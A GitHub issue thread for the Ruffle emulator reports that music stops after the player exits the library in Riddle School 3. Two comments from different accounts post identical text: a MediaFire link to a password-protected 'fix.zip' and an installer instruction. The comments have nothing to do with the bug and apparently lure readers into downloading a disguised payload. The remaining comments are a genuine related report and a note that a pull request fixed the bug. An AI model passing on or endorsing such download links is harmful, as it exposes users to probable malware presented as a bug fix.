### ISSUE TITLE
Riddle School 3 - Music Stops when Exiting the Library

### ISSUE THREAD

**Issue by TomFulp** [ruffle-rs/ruffle#17657]
### Describe the bug

Report by BlueMonday1984 on NG:

"Exiting the library causes the game's main theme, "Blue Sky", to stop playing altogether.

Tested on Firefox"

https://www.newgrounds.com/bbs/topic/1462651/26#bbspost27933968_post_text

### Expected behavior

Expected behavior is for the song to keep playing.

### Content Location

https://www.newgrounds.com/portal/view/430459

### Affected platform

Desktop app

### Operating system

Unknown

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by waspennator** [comment]
https://www.newgrounds.com/portal/view/314680

A similar problem also happens with the first Riddle school too where the bgm cuts out after the cutscene where you get the keys from the principals office

**Comment by n0samu** [comment]
Should be fixed by #18516
